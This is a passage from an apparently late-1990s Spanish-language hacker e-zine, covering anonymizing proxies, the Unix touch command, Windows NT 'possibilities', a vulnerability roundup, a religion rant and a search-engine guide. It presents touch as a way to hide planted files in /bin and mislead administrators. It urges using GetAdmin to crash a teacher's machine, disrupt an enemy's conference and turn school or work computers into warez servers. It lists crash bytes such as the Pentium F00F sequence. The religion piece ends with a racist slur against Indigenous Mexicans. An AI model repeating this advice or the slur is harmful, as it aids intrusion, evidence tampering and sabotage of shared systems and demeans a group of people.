conecto el proxy y no directamente nosotros. Aunque en los logs del proxy
puede figurar nuestra IP y a donde nos conectamos. En definitiva usando
proxies ocultamos nuestra IP, y por lo tanto nos ANONIMIZAMOS.

(III) ¨Como uso un proxy con mi navegador?

Lo que necesitamos para usar un proxy en un programa cliente es configurar
su direccion (IP o nombre) y el puerto en el que funciona. Debemos conocer
que tipo de servicios soporta el proxy, de acuerdo a esto cambia el puerto
en el que funciona, aunque hay muchas excepciones.
En algunos programas tenemos casillas para completar la direccion y el
puerto de un proxy para cada servicio en otros debemos poner la URL
de la forma http://DOMINIO:PUERTO ej: http://Proxy.wasantara.net.id:8080
Los tipos de proxy que soportan muchos navegadores son:HTTP,FTP,GOPHER,
WAIS, Security y SOCKS. Los cuatro primeros creo que los conocen porque
hasta en el texto mas chico y estupido sobre internet los describe. El
Security es para manejar el SSL.SOCKS se usa en las firewalls para
controlar el acceso a servicios en Internet, sirve de filtro de las
conexiones, permite loguear tan especificamente, permitir o no el acceso
a determinados sistemas y muchas otras funciones.

COMO CONFIGURAR LOS PROXIES EN LOS NAVEGADORES MAS CONOCIDOS:

=Netscape 1.22 (e inferiores)=
Menu Options->Prefereces->Proxy
(Resetear?)

=Netscape 2.0 (y superiores)=
Menu Options->Network Preferences->Proxy

=Netscape 4.x =
Menu Edit->Preferences...->Doble clik en Advanced->Clik en Proxies->
(en la derecha) marcar Manual Proxy Configuration -> Click en boton View

=Internet Explorer 2.0 for windows =
Clikea con el boton derecho sobre el icono->selecciona Properties->Advanced
->Use proxy server-> http://algun_proxy.com:8080

=Internet Explorer 3.0 for windows =
1)Menu View->Options->Connection->
2)Marcar Connect through a proxyserver
3) clikea en Settings y pone http://algun_proxy.com:8080

=Internet Explorer for Mac OS=
Menu Edit->Options->Proxy->http://algun_proxy.com:8080

=NCSA Mosaic for Unix 2.4 (o superior)=
Se deve setear la variable de entorno http_proxy a http://algun_proxy.com:
esto depende del shell:
csh -> setenv http_proxy http://algun_proxy.com:8080
bash-> export http_proxy='http://algun_proxy.com:8080'

=NCSA Mosaic for Macintosh 2.0 (o superior)=
Menu Options->Preferences->Use Cern proxy service->Gates
Setear el HTTP gate a algun_proxy.com y en el segundo casillero el port

=Enchanced Mosaic for Macintosh=
Menu Edit->Prefereces->Proxy server poner http://algun_proxy.com:8080

=Lynx for Unix 2.3 o superior =
Igual que el NCSA MOSAIC hay que setear la variable de entorno.(ver arriba)

Para configurar en otros programas buscar en la ayuda y en los menues
o se pone la URL o la direccion y el puerto.

(IV) ¨Que proxies puedo usar?

Hace un tiempo se hizo famoso el www.anonymizer.com, este brinda
el servicio de anonimizacion, claro se hizo pago y tenemos un retardo de
unos segundos cada vez que lo usamos si no abonamos.
Pero existen muchos otros proxies en el mundo que nos pueden servir,
algunos son reservados para determinados usuarios, otros filtran, algunos
dicen que borran sus logs semanalmente, otros que se los dan a la justicia
si se los piden, unos son mas rapidos otros son lentos. Por eso es cuestion
de buscar y encontrar uno que nos brinde seguridad y velocidad
(servicio y limpieza?:) , FTP y HTTP como minimo.
Si encuentran un proxy fijense de que tipo es, generalmente se ven cosas
com FTP:1030 SOCK:8010 HTTP:8080 esto indica en que puerto soporta cada
servicio.

ALGUNOS PROXIES EN EL MUNDO:
(AUSTRALIA-ALEMANIA-BELGICA-USA-INDONESIA-ISRAEL-ITALIA-GRECIA-ESPA¥A-HOLANDA)
web.mit.edu:80 (funciona siempre pero es 'conocido')
win.tue.nl:8080 (dejo de funcionar)
proxy.magusnet.com:8080 (no funciona-probar)
proxy.voz.cz:8080 (probar)
proxy.di.uoa.gr:8080
proxy.aljan.com.au:8080 socks:8010 (restringido?)
white.aljan.com.au:8080 socks:8010 (restringido?)
wwwproxy.weizmann.ac.il:8080
Proxy.wasantara.net.id:8080 o 3128 202.159.81.75 (funciona bien)
proxy.netura.net.id:8081
proxy.belnet.be:8000
proxy.tarheel.net:8080
[ de los siguientes no se nada, averiguen los puertos y demas datos]
frankfurt.www-cache.dfn.de
cache.nic.surfnet.nl
koeln.www-cache.dfn.de
proxy.cineca.it
proxy.imaginet.be
proxy.rediris.es
proxy.interpac.be
proxy.skynet.be
[ si conocen mas o mejores mandenme mail]

Prueben todos los que puedan y elijan, les recomiendo visitar la pagina
web de cada uno para informarse que tipo de proxy es y como manejan los
logs. Recuerden que sites como hotmail nos rebotan si usamos proxies
conocidos, prueben con otros y listo!
Para comprobar que realmente estan ocultando su procedencia pueden
hacerlo en la misma pagina de Raregazz, en la parte de mensajes
anonimos aparece su direccion IP, prueben con y sin proxy. Para FTP
conectence con algun servidor que les diga "Hola [tu IP] te estamos
vigilando"
:) que vigilen...

"Desde que uso proxies soy mas feliz"
---|---

=VoraX= vrx@bigfoot.com {llave PGP a pedido}--= 30/12/97
==============================================================================

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

Comando TOUCH - cambiar hora y fecha de un archivo

Este es un comando muy util en todos los hack's. Podemos cambiar
la fecha y hora de acceso/modificacion de un archivo al que tengamos
permiso de escritura ( o r00t ;) ). Esto sirve para confundir al admin
si detecta nuestros archivos, para enga¤ar a algunos programas de chequeo,
para que si insertamos algo en /bin no desentone con los demas comandos
y muchos usos mas.
sintaxis:

touch [-acfm] [-r reference-file] [-t MMDDhhmm[[CC]YY][.ss]] [-d time]
[-time={atime,access,use,mtime,modify}] [--date=time] [--file=reference-file]

Primero especificamos:
-a = Solo cambia la f/h del ultimo acceso al archivo.
-m = Solo cambia la f/h de cuando se modifico el archivo.

-t MMDDhhmm[[CC]YY][.ss] = especifica los 'datos temporales'
MM= mes DD=dia hh=hora mm = minutos OPCIONALES: CC=siglo YY=a¤o .ss=segundos

-r archivo_de_referencia =Usa los 'datos temporales' del archivo_de_referencia

(esto es lo basico, hay mas)
ejemplos:

unix:~$ls -l
-rw------- 1 vorax users 3773 Nov 15 10:08 mbox
-rw-r--r-- 1 vorax users 3717 Dec 16 21:34 pedo

unix:~$ls -lec
-rw------- 1 vorax users 3773 Sat Dec 13 20:21:36 1997 mbox
-rw-r--r-- 1 vorax users 3717 Mon Dec 16 21:34:10 1997 pedo

(si queremos dejar igual pedo a mbox):
unix:~$touch -r mbox pedo (toma mbox como referencia)
unix:~$ls -l
-rw------- 1 vorax users 3773 Nov 15 10:08 mbox
-rw-r--r-- 1 vorax users 3717 Nov 15 10:08 pedo

unix:~$ls -lec
-rw------- 1 vorax users 3773 Sat Dec 13 20:21:36 1997 mbox
-rw-r--r-- 1 vorax users 3717 Mon Dec 16 21:34:10 1997 pedo

F/H especifica: (12/05 20:30 hs) (a¤o actual)

unix:~$ touch -t05122030 prueba
unix:~$ ls -le prueba
-rw-r--r-- 1 vorax users 5 Mon May 12 20:30:00 1997 prueba

12/05/1995 20:30hs:

unix:~$ touch -t051220301995 prueba
unix:~$ ls -le prueba
-rw-r--r-- 1 vorax users 5 Fri May 12 20:30:00 1995 prueba

Sin parametros pone el tiempo actual:
unix:~$ date
Tue Dec 16 00:47:22 EDT 1997
unix:~$ touch prueba
unix:~$ ls -le prueba
-rw-r--r-- 1 vorax users 5 Tue Dec 16 00:47:07 1997 prueba
===========================================================================
=VoraX= 12/97 - vrx@bigfoot.com

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º º +++ Azum Lord +++ º
º LAS º º
º POSIBILIDADES EN º http://www.xoom.com/logos/wlm.htm º
º WINDOWS NT º AzumLord@bigfoot.com º
º -primera parte- º º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º CONTENIDOS º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

1.ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ>> Disclaimer <<ÍÍÍÍÍ
2.ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ>> Introduccion <<ÍÍÍÍÍ
3.ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ>> Posibilidades <<ÍÍÍÍÍ
4.ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ>> Acciones <<ÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 1. DISCLAIMER.- º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

El contenido de este texto esta solamente destinado a usos educacionales,
de investigacion y de desarrollo. En ningun momento el creador de este
texto se hace responsable de los da¤os causados debido a un mal uso de el
mismo.

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 2. INTRODUCCION.- º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Este articulo trata sobre algunas de las posibilidades que se pueden
explotar a Windows NT, y talvez con este articulo se te prenda el foco
y se ocurran algunas ideas similares o mejores porque como vas a ver
se pueden hacer muchas cosas con este Sistema Operativo.

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 3. POSIBILIDADES.- º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

1. Alguna vez se te ha ocurrido que seria divertido que mientras el
profesor de computacion esta dando su clase con el ca¤on, tu sabes ese
aparatito que se conecta a la computadora y la proyecta en el pizarron
el profesor te esta explicando por 11a vez los comandos del MSDOS, te
imaginas que a mitad de esto la computadora se apaga };->.

2. O que uno de tus enemigos va a dar una conferencia estan las
personalidades mas importantes y el tan seguro de su conferencia que cree
que todo le va a salir perfecto y a media conferencia llega un mensaje
rayandosela a todo el publico presente };->, ups eso si que seria
ridiculizante.

3. O si alguna vez hiciste un trabajo en una computadora de tu
escuela/trabajo y por alguna razon lo tuviste que dejar ahi y por alguna
desconocida razon no vas a estar, pero ese mismo trabajo era un trabajo de
equipo y para colmo sales de viaje, le hablas a tu compa¤ero de equipo, le
das la IP de esa computadora, un login y un passwd y desde la comodidad de
su hogar/trabajo el saca el archivo!!!!!!!

4. Te gusta el warez y necesitas una computadora que este siempre este
conectado a internet, tu sabes para intercambiar juegos/programas/o lo
que sea, entonces agarras una computadora de tu escuela/trabajo y la
conviertes en un servidor ftp.

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 4. ACCIONES.- º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

1. Esto se puede hacer de una forma muy sencilla lo primero que necesitas es
el GetAdmin ( disponible en la pagina de RareGazZ ) y un programita que se
llama BootAdmin este programita se puede conseguir en www.bhs.com es
totalmente GRATIS pero este programa puede apagar solo las computaras donde
tu seas administrador y esto ultimo es facil de hacer con el getadmin.

2. Esto se puede hacer con un programita que se llama NT_Hail este programa
permite enviar mensajes a cualquier computadora conectada a tu dominio
incluyendo la del servidor. Este programa se puede conseguir en
www.filez.com

3. Esto se puede hacer con un telnetd daemon y hay varios como el de Ataman
que es gratis, con este programa puedes convertir cualquier computadora en
un servidor puedes configurarlo para el numero de usuarios que desees y
muchas otras opciones mas.

4. Esto se puede lograr con el SERV-U que convierte cualquier computadora
en un servidor FTP este programa lo puedes encontrar en mi pagina.

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º 5. CONCLUCION.- º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Como puedes ver las posiblidades son muchas solo es cuestion de imaginacion,
quiero volver a decir que las posibilidades de arriba son solo algunas.

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

MAS BICHOS EN INTERNET
========================

IP BUG
Un usuario de internet identificandose como m3lt reporto un BUG que
inmediatamente congelaria maquinas Windows (3.11/95/NT). Cuando se indago,
varios sistemas fueron encontrados como afectados aparte de Windows. Este
error es causado en los sistemas que no detectan un error cuando se recibe
un SYN spoofed (falso) donde la direccion destino y el puerto destino son
el mismo que la fuente.

IRIS Buffer Overflows
Silicon Graphics aviso de un error de sobrecarga en los buffers en df, eject
y libXt. El error se extiende hasta con Magic Desktop. Los permisos que
deben usarse para evitar el error son:

# /bin/chmod 500 /usr/sbin/syserr
# /bin/chmod 500 /usr/lib/desktop/permissions

Parches pueden obtenerse en:
sgigate.sgi.com
~ftp/security
~ftp/patches.

TCP Fragment Overlap
Un error en Linux, Windows NT y Windows 95 que permite que usuarios con
malas intenciones estrellen el sistema. Cuando se re-ensamblan los
fragmentos, se hace un test para ver si son muy largos. Pero, no se hacen
tests para ver si el fragmento es muy peque¤o. El resultado es que memcopy()
es pasado a un numero negativo que causa un crash en la maquina.
El exploit esta disponible por internet. Una version maliciosa del exploit
original permite estrellar muchos sistemas al mismo tiempo.

Microsoft Internet Explorer Ver.4 OverFlow
Un anuncio sacado a la luz por L0pht Heavy Industries describe una sobrecarga
del buffer en todos los programas que vienen con la suite IE4 como lo son
el navegador y Outlook Express. Como no existen restricciones en cualquier
link que contiene una URL del tipo "res:" permite a usuarios remotos ejecutar
codigo haciendose pasar por el usuario ejecutando el software.

Pentium Killer
El siguiente codigo, cuando es alimentado a un Pentium ocasiona un Crash:
F0 0F C7 C8

Cisco Passwords
Para demonstrar lo simple que es el tipo de encripcion usado por cisco, se
creo un programa en C y un shell Bourne que fue posteado a las listas de
seguridad en internet. El tiempo de decripcion es menor a un segundo.

Inseguridad NT
Solar Designer ha sacado a la luz un papel documentando todas las formas
en que se puede hackear, estrellar, crackear, etc. Un sistema NT.

Root Remoto en BSD
Secure Networks descubrio un exploit remoto que en algunos daemons de
telnet BSD permiten obtener shell root.

Exploit remoto en lpd
Un agujero fue encontrado en el daemon lpd de BSD que permite la manipulacion
remota de archivos, asi como tambien la habilidad de ejecutar comandos
remotos para obtener un shell.

Microsoft Internet Explorer Agujero de seguridad en Java
Un problema de seguridad con serias ramificaciones ha sido descubierto.
Los applets java no pueden (supuestamente) conectarse a otro sitio desde
el cual son compilados, pero existe una forma de hacer esto.
El agujero no es de Java, unicamente del navegador de Microsoft.

Error en WinNT
Este error permite a cualquier usuario estrellar el sistema u obtener
privilegios de administrador.

Peligro con Windows 95
Si surfeas la red usando el explorer de Microsoft desde una red NT corre
peligro tu password (windows 95 no los encripta) si un atacante se mete
al servidor NT.

NTSecurity saca Red Button
http://www.ntsecurity.com/RedButton/Red Button
Red Button es una herramienta que te permite conectarte a cualquier maquina
NT disponible, ver partes del registro, etc. Una utilidad que protege
parcialmente es: http://ntbugtraq.rc.on.ca/david.htmfree

L0pht saca L0phtCrack
http://www.l0pht.com/advisories.htmlL0phtCrack
L0phtCrack es una herramienta que te permite recuperar passwords NT usando
diferentes metodos.

¨ estamos seguros ?

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

RELIGION Y OTRAS COSAS INSERVIBLES
Recopilacion por el hereje mayor: RareTrip

1. Que diablos es esto???
2. ¨Creo en dios?
3. ¨Crees en dios?
4. Juan Diego al estrellato

Parte Uno. Que diablos es esto???
Por: RareTrip

RareGaZz desde sus principios se obligo a brindar temas de polemica en sus
bytes por eso este texto ha sido recopilado para su publicacion. Sentiremos
mucha pena si perdemos lectores por este texto pero deben permitirnos la
libre expresion y libertad de creencias asi como nosotros se las permitimos
a ustedes. NADIE aqui dice que lo que crees es mentira! Nada mas te invitamos
a razonar un poco sobre lo que haces y lo que das por verdadero. Al finalizar
puedes olvidar esto... o aplicarlo en tu vida. Tu decides.

Parte Dos. ¨Crees en dios?
Por: Goethe

¨ QUIEN osaria decir: "Creo en dios" ?
Puedes preguntar a sabios y sacerdotes, y su respuesta no parecera sino una
burla dirigida al preguntador.
¨ QUIEN puede confesar: "Creo en el" ?
¨ QUIEN siendo capaz de sentir, puede atreverse a exclamar: "No creo en el" ?
Aquel que todo lo abarca, aquel que todo lo sostiene, ¨No abarca, no te
sostiene a ti, a mi, a el mismo? ¨No se extiende el cielo formando boveda
alla en lo alto? ¨No esta la tierra firme bajo nuestros pies? ¨No se elevan
las eternas estrellas mirando con amor? ¨No te contemplo yo clavando mis ojos
en los tuyos? Y todo cuanto existe ¨No impresiona tu cabeza y tu corazon
y se agita visible e invisible cerca de ti en un eterno misterio? Por grande
que sea, llena de esto tu corazon, y cuando, penetrada de tal sentimiento,
seas feliz, nombralo entonces como quieras, LLAMALE FELICIDAD, CORAZON, AMOR,
DIOS. Para ellos no tengo nombre; el sentimiento es todo. El nombre no es
mas que ruido y humo que ofusca la lumbre del cielo.

Parte Tres. ¨Crees en dios?
Por: Osho

Yo no creo en creencias. Eso tiene que ser entendido primero. Nadie me
pregunta ¨crees en el sol? ¨crees en la luna? Nadie me pregunta: ¨crees en
la rosa? No hay necesidad, la puedes ver. La rosa existe o no existe. Solo
se cree en ficciones, no en hechos. Dios es la mas grande ficcion que el
hombre ha creado.
Dejenme explicarles por que la gente ha creido en Dios.
Una de las cosas mas significativas que hay que entender sobre la mente
del hombre, es que la mente siempre anda buscando y preguntando sobre el
significado de la vida, si la vida tiene algun sentido. Asi pues, el hombre
ha venido buscando si la vida tiene algun sentido, y creo a Dios como una
ficcion tratando de que asi la vida tuviera sentido, significado.
Sin Dios, el mundo se vuelve accidental. Deja de ser una creacion de un
Dios sabio que lo creo para tu desarrollo, tu crecimiento o para alguna cosa.
Sin Dios, el mundo es accidental, sin sentido. Por lo mismo, el hombre crea
todo tipo de ficciones -Dios, el Nirvana, los Cielos, el Paraiso, la Otra
Vida despues de la muerte y hace todo un sistema religioso. Pero todo es una
ficcion tratando de satisfacer ciertas necesidades psicologicas.
Yo no puedo decir "Dios existe". Tampoco puedo decir "Dios no existe". Para
mi no tiene sentido, es un fenomeno ficticio. ¨Cual es el significado de
una rosa o de una nube flotando en el cielo? No hay ningun significado y sin
embargo tienen una tremenda belleza. No tienen sentido. Un rio sigue fluyendo
y lleva tanta alegria. ­No se necesita que tenga ningun sentido! Como es,
es suficiente.
No creas ficciones. Una vez que creas una ficcion, tienes que crear mil y
una ficciones para sostenerla fuera de la realidad.
Por ejemplo: hay religiones que creen en Dios y hay religiones que NO creen
en Dios. De modo que Dios no es una necesidad para las religiones. El Budismo
no cree en Dios. El Jainismo no cree en Dios. Solamente hay tres religiones,
las tres enraizadas en el Judaismo, que manejan la creencia en Dios:
Cristianismo, Judaismo e Islamismo. Buda nunca creyo en Dios, no tenia
necesidad de hacerlo. Tampoco Mahavira, y sin embargo sus vidas fueron tan
divinas como puede ser la vida.
No existe Dios sentado en los Cielos y creando el mundo ¨O piensas que
Dios crearia un desorden como esto que llamas mundo? Si alguien ha creado
este mundo debe haber sido el Diablo, no puede haber sido Dios. Sin embargo,
viejas ficciones, repetidas millones de veces, empiezan a tener su propia
realidad. ­Y que clase de ficciones bobas pueden volverse "realidad" una vez
que empiezas creyendo en ellas! Y solo por que lo dice la Biblia... Ya sabes
la historia de Galileo. Cuando Galileo encontro que NO es el sol el que gira
alrededor de la tierra, sino al revez, el Papa "infalible" le dijo "tienes
que cambiarlo, porque la Biblia dice que el sol gira alrededor de la tierra.
Y la Biblia no puede equivocarse porque ha sido escrita por Dios."
Galileo
era un hombre de un humor extraordinario y penso: "¨Para que discutir con
estos idiotas?"
Son los mismo que dicen todavia: "Todas las cosas son
posibles para Dios"
. Una ficcion que tienen que sostener con otra y otra y
otra ficcion. Y llegar al punto del absurdo. Eso es la Biblia: un absurdo
completo.

Parte Cuatro. Juan Diego al estrellato
Por: RareTrip

Mexicanos creidotes de la iglesia... les han mentido! Recuerdan Juan Diego?
Aquel Indio que vio a la virgen en el cerro ese? Pues ahora resulta, que
como la iglesia catolica mexicana quiere hacer Santo a ese personaje (o
deberia decir leyenda?) han cambiado todo su linaje. Agarrense.
Ahora resulta que Juan Diego era Nieto de un emperador mexica o algo asi.
El caso es que era filosofo, pensador y poseia castillos con mas de 30
mujeres. Adios al mito del indio. Pero eso si, ahora ya casi es santo.

¨como creyeron que iban a hacer santo a un pinche indio mexicano?

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

BUSCADORES EN INTERNET


En este articulo se pretende tratar algo que no es nuevo dentro de Internet,
ni tampoco para muchos de vosotros, amables lectores, y es la necesidad
constante de buscar y encontrar informacion, ficheros, personas y links dentro
de la vasta red INTERNET.

¨Cuantos no hemos usado un buscador?.

¨Cuantos no nos hemos visto perdidos, viendo como nuestra direccion
favorita cambia de lugar y no la encontramos?.

¨Quien no ha visitado una pagina Warez o de Craks y se ha encontrado
que el archivo no se puede bajar por estar en una direccion anticuada o el
sitio esta bloqueado?.

¨Quien no ha visitado la pagina de algun buscador hacker, situado en
alguna pagina de nuestros amigos, para obtener informacion a lo buscado?.

De un tiempo a esta parte se ha afianzado en la red los buscadores o
motores de busqueda y no son servicios de modo texto estilo Archie, como se
utilizaban antes, sino que estan programados para poder ser vistos por
nuestros navegadores habituales.

Basicamente la funcion, mas que la de ofrecer mera informacion, es la de
hacer de nexo entre los proveedores de todo tipo de datos y sus consumidores.

No hace muchos a¤os los buscadores estaban menos evolucionados y se
encargaban de encontrar un fichero, un punto en la red y tenian que ser
desarrollados por personas "con mucha fe" porque no ganaban ni un duro, no
siendo como ahora, que los mantienen y desarrollan con dinero y la
publicidad que se hacen las empresas que lo montan y las cotizaciones en
bolsa, como el caso de YAHOO, etc...

Estas imagenes que te tienes que bajar,la publicidad, es el precio, tu
tiempo, que tienes que pagar por usar un servicio gratuito, y aumentando con
ello el tiempo, para obtener aquello que se busca y tu tarifa de Timofonica
engorda, claro.

Segun la dificultad que se precise para encontrar una cierta informacion,
se usara un BUSCADOR o un MULTIBUSCADOR (muchos de ellos).

El buscador tratara de encontrar la informacion solicitada por el usuario en
su propia base de datos y si no son capaces de encontrarla, te presentan otros
buscadores en los que puedas volver a intentarlo o bien el buscador indaga en
alguna base de datos "amiga".

El multibuscador no suele tener base de datos propia, sino que chupa info
valiendose de los demas buscadores, indagando "a destajo" en los mismos y
diciendote lo que han encontrado.

Ningun buscador es mejor que otro, solo variara la situacion en la que
nosotros nos encontremos para usar uno u otro. Si la informacion es facil de
encontrar, los buscadores dan muy buenos resultados ofreciendote suficiente
informacion sin saturarte con cientos de links. Si la informacion es dificil
de encontrar es mejor utilizar un multibuscador por ser varios buscadores a la
vez los que te hacen el trabajo y si daran respuesta a tus necesidades de
info.

Lo que debemos de hacer es utilizar un buscador, y si no nos da la
informacion satisfactoriamente, utilizar un multibuscador.

Ahora, tienes que tener mucho ojo para darte cuenta, de que tipo de
informacion es la que te combiene obtener y que buscador vas a utilizar, por
que todas las bases de datos de los mismos no son iguales,ni todos los
buscadores son lo mismo, ya que unos estaran mas especializados que otros y
ofreceran mejores resultados para una determinada busqueda. Te puede ayudar a
determinar que buscador escoger el hecho de determinar el lugar que puede
albergar la informacion requerida: el pais propio, una empresa internacional,
nacional o regional, los grupos de noticias y sitios FTP.

Si buscas una noticia o informacion nacional o local lo mejor es usar un
buscador con base de datos nacional como Ozu, Ole y Sol, para Espa¤a o Sbel
y Mex-Web para Mexico.

Si la informacion es internacional, lo mejor es usar un buscador nativo de
ese pais o uno internacional o uno con la funcion especial de buscar
unicamente dentro de servidores con la extension de un pais determinado como
lo hace Hot-Bot (la mejor maquina de busqueda segun PcMagazine e Internet Lab)

Hay otros buscadores con motores especiales usados para buscar personas y
los buscadores de ficheros. Como metacrawler y Whowhere.

No hay que desde¤ar los listines telefonicos y paginas amarillas de Internet
que potenciaran nuestras posibilidades de encontrar mayor informacion.

Si a pesar de todo lo dicho no consigues encontrar lo que buscas, entonces
usa el buscador de ficheros ARCHIE de toda la vida. Es bastante eficaz o
utiliza los buscadores HACKER que te puedes encontrar en la web de los
aficionados al undergrownd.Como:

http://altavista.box.sk
http://www.box.sk/neworder
http://Mp3.box.sk

Tambien se puede utilizar una base de datos muy buena en
http://www.filez.com pero, sin lugar a dudas, el mas internacional es:
http://altavista.digital.com (creo que es completisimo).


¨COMO MEJORAR LA BUSQUEDA EN ALTAVISTA?

Usando:

a) (" "): El texto encerrado entre comillas, se buscara tal y como
figura entre las comillas.

b) (+): Obliga a que la palabra introducida a continuacion figure en
los documentos encontrados.

c) (-): Obliga a que la palabra introducida a continuacion no aparezca
en los documentos encontrados.

d) (*): Actua de caracter comodin.


Ejemplo:
========

1) "escuela de monta¤a" + Barcelona - Madrid
SI NO
Este ejemplo buscara todas las paginas que digan escuela de monta¤a
y Barcelona pero no Madrid.

2) "museos" + chiapas - mad* - bar*
No palabras No palabras


¨COMO TRABAJAR CON LOS BUSCADORES?

Normalmente incorporan un campo en el que debe de incluirse la o las
palabras a buscar, como en el ejemplo anterior, que utiliza operadores
booleanos, pudiendose solicitar que se muestre la informacion que contenga una
u otra palabra, las dos juntas, o una de ellas, pero sin que aparezca la otra.
Muchos de los buscadores permiten seleccionar el lugar donde se quiere buscar
como CHIAPAS, BARCELONA o MADRID vistos arriva, (regiones o pais donde se
encuentra el recurso que se precisa y nos ahorra tiempo porque el buscador
tardara menos en ofrecer la informacion y el usuario tardara menos en filtrar
todos los links que le son ofrecidos, ya que se ajustan a sus necesidades y
hay menos que mirar.Tambien nos mostrara el nodo mas cercano a nuestra
conexion, aunque esto no siempre aumentara nuestra rapidez), las News, sitios
web, buscadores de personas. Otros estan divididos en secciones o areas como
deportes, cultura, ocio, empresas, etc.

¨QUE BUSCADORES CONOCEMOS EN INTERNET?

Pienso que esta es la pregunta de 1.000.000 porque la RED no para de crecer
y crecer mas y mas todos los dias y todos los dias sale algo nuevo. CREA,
CAMBIA DE SITIO, RENUEVA, BORRA Y DEBORA INFO SIN PARAR. Pero pongo algunos
mas usados.

BUSCADORES INTERNACIONALES
==========================
www.altavista.digital.com.....Muy Completo y tambien en Espa¤ol si lo deseas.
www.hotbot.com................Localizacion de paginas por pais, fecha, etc.
www.infoseek.com..............Redireccion por NetScape
www.lycos.com.................Ficheros Gif, JPEG y MPEG.
www.yahoo.com.................Por categorias y temas.
www.excite.com................Busqueda por conceptos.
www.webcrawler.com............Hace un Index de las paginas.
www.magellan.com


BUSCADORES EN ESPA¥A
====================
www.ozu.es
www.ole.es
www.sol.es
www.glbalcom.es/indice
www.donde.uji.es...............Relacion para web Espa¤a.
www.encuentrelo.com
http://biwe.cesat.es
www.fantastico.com
trovador.combios.es

BUSCADORES EN MEXICO
====================
http://rtn.net.mx/sbel/
http://mexico.web.com.mx/

BUSCADORES DE PERSONAS
======================
www.whowhere.com
www.spanish.whowhere.com (el mismo de arriba pero en espa¤ol)
www.listin.com
www.x500.rediris.es:8888/Mc=ES

BUSCADORES DE FICHEROS
======================
www.filez.com
www.ua.es:8080/internet/castellano/archie.html
www.elibrary.com......................Buscar en libros, mapas, etc.
http://ftpsearch.com/searchpage/indexA.html........... Busquedas en FTP's
http://ftpsearch.ntnu.no/............................. Busquedas en FTP's

SITES DE SHAREWARE
===================
